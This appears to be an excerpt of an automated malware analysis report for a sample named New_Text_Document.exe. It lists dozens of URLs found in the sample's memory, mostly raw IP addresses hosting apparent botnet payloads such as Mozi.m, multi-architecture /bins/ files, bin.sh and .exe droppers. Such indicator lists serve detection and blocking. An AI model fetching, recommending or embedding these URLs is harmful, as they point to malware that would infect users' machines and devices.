                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.109.97:33531/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.109.97:33531/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.230.26.69:62579/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.75.197.184:41884/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.166.220.109:59928/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.178.113.13:33120/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.178.113.13:33120/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.178.113.32:42839/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.178.125.30:49491/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.178.125.86:35112/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.4.124.58:12137/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.51.119.107:19320/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.51.181.238:8094/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.51.191.174:18048/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.55.134.71/sett/kung.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.122.41.174:58417/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.204.13.144:9166/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.204.186.225:13718/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.204.193.17:63055/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.138:19417/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.204.221.182:30500/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.204.233.138:34193/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.204.233.42:28807/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.204.235.113:44940/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.204.253.168:30390/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.217.100.150:34020/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.223.44.206:8418/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.232.102.222:2910/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.232.58.153:27543/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.70.166.107:12317/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.116.40.33:25597/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.44.95.211/bins/x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.174.22.213/bins/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.174.22.213/bins/x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.188.182.47:9229/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.180.16.17:11586/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.145.51.44/asas.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.145.51.44/elevator.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.113.211.169:24560/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.113.219.200:46168/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.204.151.16:26139/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.209.175.157:38169/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.34.80.129/wbwj/fjafusoft/Client_zffz.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.34.80.129/wbwj/fjafusoft/Update_zffz.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.87.35.18:9240/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.90.202.159:45172/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.179.16.62:42753/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.184.126.95:45535/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.192.158.40:18524/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.193.211.232:43398/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.194.196.39:61669/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.194.60.86:48246/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.197.134.180:37772/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.199.67.224:18137/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.199.69.236:59418/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.219.6.5:6032/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.225.159.186:8186/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.230.143.174:17905/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.230.226.111:39603/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.250.243.131:1875/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.34.31.110:14671/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.38.139.97:63042/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.38.96.92:29414/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.54.161.58:12683/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.54.45.188:45320/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.55.249.70:36312/.i
